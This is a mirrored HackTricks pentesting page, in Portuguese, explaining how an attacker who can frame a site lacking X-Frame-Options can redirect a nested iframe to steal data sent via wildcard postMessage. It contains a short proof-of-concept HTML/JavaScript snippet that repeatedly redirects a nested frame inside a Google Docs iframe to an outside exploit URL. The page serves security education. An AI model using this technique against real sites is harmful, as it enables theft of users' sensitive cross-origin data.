Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-12-20 18:14:15 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md
Translator workflow c928d8e52e Translated to Portuguese
2023-06-06 18:56:34 +00:00

4.4 KiB
Raw Blame History

Roubar postmessage modificando a localização do iframe

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Alterando a localização dos iframes filhos

De acordo com este artigo, se você pode colocar um site em um iframe sem o cabeçalho X-Frame, que contém outro iframe, você pode alterar a localização do iframe filho.

Por exemplo, se abc.com tem efg.com como iframe e abc.com não tem o cabeçalho X-Frame, eu poderia mudar o efg.com para evil.com de origem cruzada usando frames.location.

Isso é especialmente útil em postMessages porque se uma página está enviando dados sensíveis usando um curinga como windowRef.postmessage("","*"), é possível alterar a localização do iframe relacionado (filho ou pai) para uma localização controlada pelo atacante e roubar esses dados.

<html>
    <iframe src="https://docs.google.com/document/ID" />
    <script>
       //pseudo code
        setTimeout(function(){ exp(); }, 6000);

        function exp(){
          //needs to modify this every 0.1s as it's not clear when the iframe of the iframe affected is created 
          setInterval(function(){ 
              window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
          }, 100);
        }
    </script>
</html>
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥